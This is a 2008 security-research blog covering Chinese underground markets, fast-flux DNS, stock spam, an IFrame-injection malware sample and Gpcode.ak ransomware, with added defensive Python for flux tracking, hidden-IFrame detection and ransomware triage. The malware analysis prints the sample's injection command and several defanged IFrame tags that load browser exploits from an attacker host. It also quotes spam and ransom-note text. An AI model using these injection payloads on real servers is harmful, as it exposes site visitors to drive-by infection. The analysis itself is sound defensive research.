WEIS'08: "Studying Malicious Websites and the Underground Economy on the Chinese Web"

Friday, July 4. 2008
The 7th Workshop on the Economics of Information Security (WEIS'08) took place last week at Dartmouth College's Tuck School of Business. Several interesting papers like "Security Economics and European Policy", "Do Data Breach Disclosure Laws Reduce Identity Theft?", or "The Impact of Incentives on Notice and Take-down" were presented during the workshop. Our paper entitled "Studying Malicious Websites and the Underground Economy on the Chinese Web" deals with several aspects of the underground economy within China's part of the World Wide Web. Amongst other techniques, we use client-side honeypots to study malicious websites.

Abstract:
The World Wide Web is gaining more and more popularity within China, with more than 1.31 million websites on the Chinese Web in June 2007. Driven by economic profit, cyber criminals are on the rise and use the Web to exploit innocent users. In fact, a real underground black market with thousands of participants has developed, which brings together malicious users who trade exploits, malware, virtual assets, stolen credentials, and more. In this paper, we provide a detailed overview of this underground black market and present a model to describe the market. We substantiate our model with the help of measurement results within the Chinese Web. First, we show that the amount of virtual assets traded on this underground market is huge. Second, our research shows that a significant number of websites within China's part of the Web contain some kind of malicious content: our measurements reveal that about 1.49% of the examined sites contain malicious content that tries to attack the visitor's browser.

The paper is a collaboration with several researchers from China (Jianwei Zhuge, Chengyu Song, Jinpeng Guo, Xinhui Han, and Wei Zou) and a revised version of our technical report on the same topic. The full version of the paper is now available.



Fast-Flux Techniques in .mobi

Thursday, July 3. 2008
Danmec/Asprox is an SQL injection attack tool that is responsible for some aspects of the recent wave of SQL injections (a full list is maintained by ShadowServer). This malware also uses fast-flux techniques to host some facets of the attacks. For a few days now the attackers have also been using the .mobi TLD, the first time I have seen this TLD abused this way by malware. The following listing shows the result of a DNS lookup for one of the .mobi domains:
$ dig allocbn.mobi

; <<>> DiG 9.3.4 <<>> allocbn.mobi
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26203
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 0

;; QUESTION SECTION:
;allocbn.mobi. IN A

;; ANSWER SECTION:
allocbn.mobi. 600 IN A 200.167.230.85
allocbn.mobi. 600 IN A 69.247.175.135
allocbn.mobi. 600 IN A 71.56.42.87
allocbn.mobi. 600 IN A 72.187.108.240
allocbn.mobi. 600 IN A 74.138.199.132
allocbn.mobi. 600 IN A 75.66.193.0
allocbn.mobi. 600 IN A 75.143.150.108
allocbn.mobi. 600 IN A 76.175.178.111
allocbn.mobi. 600 IN A 98.165.213.34
allocbn.mobi. 600 IN A 98.192.74.13
allocbn.mobi. 600 IN A 98.223.61.12
allocbn.mobi. 600 IN A 99.233.217.232
allocbn.mobi. 600 IN A 118.160.173.122
allocbn.mobi. 600 IN A 190.18.116.54

The DNS answer has a short time to live (600 seconds, i.e. 10 minutes) and the IP addresses are located in many different networks, a typical sign of fast-flux techniques. Most of the IP addresses are located in consumer broadband networks such as Comcast and Road Runner rather than at hosting providers; presumably these are infected, compromised end-user machines. When doing a DNS lookup a couple of minutes later, a different set of IP addresses is returned:
;; ANSWER SECTION:
allocbn.mobi. 493 IN A 208.107.82.31 [NEW]
allocbn.mobi. 493 IN A 71.56.42.87
allocbn.mobi. 493 IN A 72.177.224.125 [NEW]
allocbn.mobi. 493 IN A 72.187.175.42 [NEW]
allocbn.mobi. 493 IN A 75.143.150.108
allocbn.mobi. 493 IN A 76.171.151.145 [NEW]
allocbn.mobi. 493 IN A 76.175.178.111
allocbn.mobi. 493 IN A 81.203.14.159 [NEW]
allocbn.mobi. 493 IN A 92.233.227.123 [NEW]
allocbn.mobi. 493 IN A 98.165.213.34
allocbn.mobi. 493 IN A 98.192.74.13
allocbn.mobi. 493 IN A 98.223.61.12
allocbn.mobi. 493 IN A 99.233.217.232
allocbn.mobi. 493 IN A 156.34.132.62 [NEW]

Seven of the 14 addresses changed within ten minutes, which shows the "fluxiness" of the domain. By DNS mining, i.e., performing DNS lookups of this domain every TTL+1 seconds, we can observe the botnet behind this attack. In the past week, we found about 1,000 unique bot IP addresses this way.
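The DNS-mining procedure described above, as an added example that is not code from the original post: it parses dig answers, reports which addresses are new compared with the previous lookup, accumulates the unique bot addresses, and derives the TTL+1 polling delay. The two answer sections are the ones quoted above (without the [NEW] marks, which the code computes itself); `mine_live` is the only part that needs network access.

```python
"""Added example (not from the original post): DNS mining of a suspected
fast-flux domain, following the TTL + 1 second polling described in the text."""
import re
import subprocess
import time
from typing import Set, Tuple

# Answer-section line of dig: "<owner> <ttl> IN A <ipv4>"
A_RECORD = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})$")


def parse_dig_answer(dig_output: str) -> Tuple[int, Set[str]]:
    """Return (lowest TTL in the answer, set of A-record addresses)."""
    ttl, ips = None, set()
    for line in dig_output.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            ttl = int(m.group(2)) if ttl is None else min(ttl, int(m.group(2)))
            ips.add(m.group(3))
    return (0 if ttl is None else ttl), ips


def distinct_prefixes(ips: Set[str], bits: int = 16) -> int:
    """Number of distinct /bits networks; one name spread over many networks is a flux hint."""
    mask = (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF
    nets = set()
    for ip in ips:
        a, b, c, d = (int(x) for x in ip.split("."))
        nets.add(((a << 24) | (b << 16) | (c << 8) | d) & mask)
    return len(nets)


class FluxTracker:
    """Accumulates addresses over repeated lookups of one domain."""

    def __init__(self, domain: str) -> None:
        self.domain = domain
        self.seen: Set[str] = set()   # every address observed so far
        self.last: Set[str] = set()   # addresses in the previous answer

    def record(self, dig_output: str) -> Tuple[Set[str], int]:
        """Feed one lookup; return (addresses new since the previous answer, seconds until next poll)."""
        ttl, ips = parse_dig_answer(dig_output)
        new = ips - self.last
        self.last = ips
        self.seen |= ips
        return new, ttl + 1


def mine_live(domain: str, rounds: int) -> Set[str]:
    """Poll the real resolver `rounds` times, sleeping TTL + 1 s between lookups (needs network)."""
    tracker = FluxTracker(domain)
    for _ in range(rounds):
        out = subprocess.run(["dig", domain], capture_output=True, text=True, check=True).stdout
        new, delay = tracker.record(out)
        print(f"{domain}: {len(new)} new of {len(tracker.last)}, {len(tracker.seen)} unique so far")
        time.sleep(delay)
    return tracker.seen


# The two answer sections quoted in the post (the [NEW] marks are computed, not copied).
LOOKUP_1 = """\
allocbn.mobi. 600 IN A 200.167.230.85
allocbn.mobi. 600 IN A 69.247.175.135
allocbn.mobi. 600 IN A 71.56.42.87
allocbn.mobi. 600 IN A 72.187.108.240
allocbn.mobi. 600 IN A 74.138.199.132
allocbn.mobi. 600 IN A 75.66.193.0
allocbn.mobi. 600 IN A 75.143.150.108
allocbn.mobi. 600 IN A 76.175.178.111
allocbn.mobi. 600 IN A 98.165.213.34
allocbn.mobi. 600 IN A 98.192.74.13
allocbn.mobi. 600 IN A 98.223.61.12
allocbn.mobi. 600 IN A 99.233.217.232
allocbn.mobi. 600 IN A 118.160.173.122
allocbn.mobi. 600 IN A 190.18.116.54
"""
LOOKUP_2 = """\
allocbn.mobi. 493 IN A 208.107.82.31
allocbn.mobi. 493 IN A 71.56.42.87
allocbn.mobi. 493 IN A 72.177.224.125
allocbn.mobi. 493 IN A 72.187.175.42
allocbn.mobi. 493 IN A 75.143.150.108
allocbn.mobi. 493 IN A 76.171.151.145
allocbn.mobi. 493 IN A 76.175.178.111
allocbn.mobi. 493 IN A 81.203.14.159
allocbn.mobi. 493 IN A 92.233.227.123
allocbn.mobi. 493 IN A 98.165.213.34
allocbn.mobi. 493 IN A 98.192.74.13
allocbn.mobi. 493 IN A 98.223.61.12
allocbn.mobi. 493 IN A 99.233.217.232
allocbn.mobi. 493 IN A 156.34.132.62
"""

if __name__ == "__main__":
    t = FluxTracker("allocbn.mobi")
    first, delay = t.record(LOOKUP_1)
    print(f"first answer: {len(first)} addresses in {distinct_prefixes(first)} /16 networks, next poll in {delay}s")
    second, delay = t.record(LOOKUP_2)
    print(f"second answer: {len(second)} new addresses, {len(t.seen)} unique so far")
```

The /16 count is only a cheap stand-in for the ASN diversity one would look up in a real classifier; the point of the tracker is that the set of bots grows with every poll while the answer size stays constant.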

Stock Spam

Tuesday, June 17. 2008
Pump-and-dump schemes for penny stocks based on spam mails were quite common in 2006 and 2007. Nowadays, however, it seems like these schemes are over and I only very seldom receive such mails. One recent example of such a scam mail is:
Now see for yourself.

Corporation: Angstrom Microsystems
Symbol OTCBB: agms
Suggested: Buy/hold
Monday close : .400
Shares traded: 331,485

Excellent release last week and investors are noticing and volume is up.

This is the beginning of great things, sales are up and deployment is increasing Angstrom Microsystems will blow you away.

Move before it's too late, obtain this stock NOW.

Please note that I modified the mail text to increase readability.
Such schemes work in practice, and spam mails can actually influence the stock market, as we showed in a study. This works because the quote of a penny stock can be moved with a relatively low number of trades.

Recently Sophos blogged about a spam campaign in which the mails contained a text about the downtime of Amazon. They theorized that these spam mails are used to short the Amazon stock in a "short and distort" scam. I doubt that this is true, especially given the fact that more than five million Amazon shares are traded per day...



IFrame Injection Attacks

Friday, June 13. 2008
Attacks against web servers are in vogue nowadays. These range from mass SQL injection attacks that insert malicious JavaScript into web sites to other forms of IFrame injection attacks.

Today we analyzed a malware sample that performs such IFrame injection attacks. The executable with MD5 hash e3e3eb9e00745537a17311a48ddcfd6d is detected by Kaspersky as Backdoor.Win32.Agent.fjs and by ClamAV as PUA.Packed.NPack-3. When executed, the sample creates several files on the hard disk: it drops several benign DLLs such as wpcap.dll (the WinPcap library) and npptools.dll, which are all related to packet capture and processing. Furthermore, two executables, 3.tmp and 6.tmp, are created.

Then the file 6.tmp is executed with the command line parameter
-idx 0 -ip $IP-RANGE -port 80 -insert "< if rame sr c="hXXp://www.XXX.cn/index.htm" width=0 height=0 frameborder=0>"

The intention is that infected machines scan the given network range for web servers on port 80 and then try to inject the given IFrame into vulnerable servers.

An analysis of the injected site leads to more malware. The HTML file contains for example four more IFrames:
IF RAME sr c="hXXp://www.XXX.cn/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1>
IF RAME sr c="hXXp://www.XXX.cn/web/index.htm" frameBorder=0 width=100 scrolling=no height=1>

As the names suggest, these IFrames contain exploits against well-known vulnerabilities in applications such as Flash or RealPlayer 11. Each of these exploits tries to install additional malware.
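A scanner for the kind of hidden IFrames shown above, as an added example that is not part of the original post or the analyzed sample: it parses a page and flags frames that are 0 or 1 pixel in size, hidden by CSS, or loaded from a host other than the page's own. The sample page and the attacker host www.attacker-example.invalid are constructed for this example; the frame attributes mirror the injected and second-stage IFrames quoted above.

```python
"""Added example (not from the original post): find hidden and off-site IFrames in HTML."""
from html.parser import HTMLParser
from typing import Dict, List, Optional, Set
from urllib.parse import urlparse


def _pixels(value: Optional[str]) -> Optional[int]:
    """Parse a width/height attribute as pixels; percentages and junk return None."""
    if value is None:
        return None
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    try:
        return int(v)
    except ValueError:
        return None


class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are invisible and/or pull content from another host."""

    def __init__(self, page_host: str) -> None:
        super().__init__()
        self.page_host = page_host.lower()
        self.findings: List[Dict[str, object]] = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}  # html.parser lower-cases attribute names
        reasons = []
        w, h = _pixels(a.get("width")), _pixels(a.get("height"))
        if (w is not None and w <= 1) or (h is not None and h <= 1):
            reasons.append(f"tiny frame {w}x{h}")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if host and host != self.page_host:
            reasons.append(f"off-site source {host}")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def find_hidden_iframes(html: str, page_host: str) -> List[Dict[str, object]]:
    """Return one finding per suspicious iframe: its src and the reasons it was flagged."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings


def offsite_hosts(findings: List[Dict[str, object]], page_host: str) -> Set[str]:
    """Hosts worth blocking or pivoting on: every flagged source not on the page's own host."""
    hosts = set()
    for f in findings:
        h = (urlparse(str(f["src"])).hostname or "").lower()
        if h and h != page_host.lower():
            hosts.add(h)
    return hosts


# Constructed page: one legitimate embed, the injected 0x0 frame, the four 1-pixel
# second-stage frames, and a CSS-hidden frame on the page's own host.
SAMPLE_PAGE = """<html><body>
<h1>Company news</h1>
<iframe src="http://www.victim.example/news/embed.html" width="600" height="400"></iframe>
<iframe src="http://www.attacker-example.invalid/index.htm" width=0 height=0 frameborder=0></iframe>
<iframe src="http://www.attacker-example.invalid/index.files/flash.htm" frameBorder=0 width=100 scrolling=no height=1></iframe>
<iframe src="http://www.attacker-example.invalid/index.files/real.htm" frameBorder=0 width=100 scrolling=no height=1></iframe>
<iframe src="http://www.attacker-example.invalid/index.files/614.htm" frameBorder=0 width=100 scrolling=no height=1></iframe>
<iframe src="http://www.attacker-example.invalid/web/index.htm" frameBorder=0 width=100 scrolling=no height=1></iframe>
<iframe src="/ads/banner.html" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    hits = find_hidden_iframes(SAMPLE_PAGE, "www.victim.example")
    for hit in hits:
        print(hit["src"], "->", ", ".join(hit["reasons"]))
    print("off-site hosts:", sorted(offsite_hosts(hits, "www.victim.example")))
```

The size check alone already catches every frame from the sample (0x0 and 100x1); the off-site check is what separates the injected frames from a site's own hidden elements, so a page that legitimately hides a same-host frame is reported with a different reason and can be triaged separately.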

Gpcode.ak vs. CWSandbox

Tuesday, June 10. 2008
Recently a new variant of Gpcode was detected by the researchers from Kaspersky Lab. Gpcode is a form of ransomware, a pretty nasty kind of malware that is used in extortion attempts. The basic idea of such malware is to encrypt certain files on the hard disk with a key known only to the attacker and then to extort money from the victim in exchange for recovering the files.

Upon startup, Gpcode.ak searches for specific files on the disk (for example files with the extensions .htm, .jpg, and .inc) and encrypts them with a 1024-bit RSA key. The suffix ._CRYPT is then appended to the original file name ($ORIGINAL._CRYPT). Once this is finished, the malware displays a pop-up with the following text:
Your files are encrypted with RSA-1024 algorithm. To recovery your files you need to buy our decryptor. To buy decrypting tool contact us at: cipher4000@yahoo.com

Furthermore, a file named !READ_ME!.txt is created on the disk that contains the following text:
Your files are encrypted with RSA-1024 algorithm.
To recovery your files you need to buy our decryptor.
To buy decrypting tool contact us at: cipher4000@yahoo.com

=== BEGIN ===
AD7D6889
010200000168000000A400008EE1630FA688F194
42766F3AE19D5483AAE44C246F66C15F5C6D0E38
0B402EF1B67A0FF10A8A08CADB2DEA19EBD957EF
151ED9365CD730BE54263C3E2FDCEDF8546FF33E
5017032833DCB0C306EA28D79CD6DB4C0E7CE96D
3B84E83EEC84740FED2D64B672148E6F86B06B16
890102FF0D22AE42D3CD4B0F7D7E2AD0A5C0724C
=== END ===

Kaspersky Lab called for aid to "Help crack Gpcode", but I doubt that cracking this key will succeed: factoring a 1024-bit RSA modulus is far beyond any published factoring record. Dancho has some more info on Gpcode.ak in his blog. Furthermore, the full CWSandbox report is available.
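A triage script for the artefacts described above, as an added example that is not from the original post, the CWSandbox report, or Kaspersky's analysis: it walks a directory tree, lists files carrying the ._CRYPT suffix by their original extension, parses any !READ_ME!.txt note for the contact address and the hex blob, and uses a byte-entropy check to spot files that were renamed but not actually encrypted. The victim directory is constructed by `build_sample_tree` (random bytes stand in for ciphertext); the note text is the one quoted above.

```python
"""Added example (not from the original post): triage a file tree for Gpcode.ak artefacts."""
import math
import os
import re
import shutil
import tempfile
from collections import Counter
from pathlib import Path
from typing import Dict, List

CRYPT_SUFFIX = "._CRYPT"
NOTE_NAME = "!READ_ME!.txt"
CONTACT_RE = re.compile(r"contact us at:\s*(\S+@\S+)", re.IGNORECASE)
BLOB_RE = re.compile(r"=== BEGIN ===\s*(.*?)\s*=== END ===", re.DOTALL)

# Note text as quoted in the post.
RANSOM_NOTE = """Your files are encrypted with RSA-1024 algorithm.
To recovery your files you need to buy our decryptor.
To buy decrypting tool contact us at: cipher4000@yahoo.com

=== BEGIN ===
AD7D6889
010200000168000000A400008EE1630FA688F194
42766F3AE19D5483AAE44C246F66C15F5C6D0E38
0B402EF1B67A0FF10A8A08CADB2DEA19EBD957EF
151ED9365CD730BE54263C3E2FDCEDF8546FF33E
5017032833DCB0C306EA28D79CD6DB4C0E7CE96D
3B84E83EEC84740FED2D64B672148E6F86B06B16
890102FF0D22AE42D3CD4B0F7D7E2AD0A5C0724C
=== END ===
"""


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ciphertext or random data sits near 8.0, text and zero-fill far below."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_ransom_note(text: str) -> Dict[str, object]:
    """Extract the contact address and the hex blob (a victim-specific token) from the note."""
    contact = CONTACT_RE.search(text)
    blob = BLOB_RE.search(text)
    return {
        "contact": contact.group(1) if contact else None,
        "blob": bytes.fromhex("".join(blob.group(1).split())) if blob else b"",
    }


def triage(root: str) -> Dict[str, object]:
    """Walk root: encrypted files, counts per original extension, notes, and renamed-only files."""
    encrypted: List[str] = []
    by_ext: Counter = Counter()
    notes: List[Dict[str, object]] = []
    not_really_encrypted: List[str] = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        if p.name == NOTE_NAME:
            notes.append({"path": str(p), **parse_ransom_note(p.read_text(errors="replace"))})
        elif p.name.endswith(CRYPT_SUFFIX):
            original = p.name[: -len(CRYPT_SUFFIX)]
            encrypted.append(str(p))
            by_ext[Path(original).suffix.lower()] += 1
            # A file that only got the suffix (or was damaged) does not look like ciphertext.
            if shannon_entropy(p.read_bytes()[:65536]) < 7.0:
                not_really_encrypted.append(str(p))
    return {"encrypted": encrypted, "by_ext": by_ext, "notes": notes,
            "not_really_encrypted": not_really_encrypted}


def build_sample_tree(root: str) -> None:
    """Constructed victim directory: three 'encrypted' files (random bytes stand in for
    ciphertext), one file that was only renamed, one untouched document, and the note."""
    d = Path(root) / "docs"
    d.mkdir()
    for name in ("photo.jpg", "page.htm", "config.inc"):
        (d / (name + CRYPT_SUFFIX)).write_bytes(os.urandom(8192))
    (d / ("empty.jpg" + CRYPT_SUFFIX)).write_bytes(b"\0" * 8192)
    (d / "notes.txt").write_text("quarterly figures, untouched\n")
    (d / NOTE_NAME).write_text(RANSOM_NOTE)


def demo() -> Dict[str, object]:
    """Build the sample tree in a temporary directory, triage it, and clean up."""
    root = tempfile.mkdtemp(prefix="gpcode-triage-")
    try:
        build_sample_tree(root)
        return triage(root)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    r = demo()
    print(len(r["encrypted"]), "encrypted files by extension:", dict(r["by_ext"]))
    print("renamed but low entropy:", r["not_really_encrypted"])
    for note in r["notes"]:
        print(note["path"], "contact:", note["contact"], "blob bytes:", len(note["blob"]))
```

The entropy threshold is deliberately loose (7.0 bits per byte); it is meant to separate ciphertext from zero-filled, truncated or merely renamed files during incident triage, not to identify the cipher. The blob is extracted as an opaque token for correlating victims; nothing about its internal structure is assumed here.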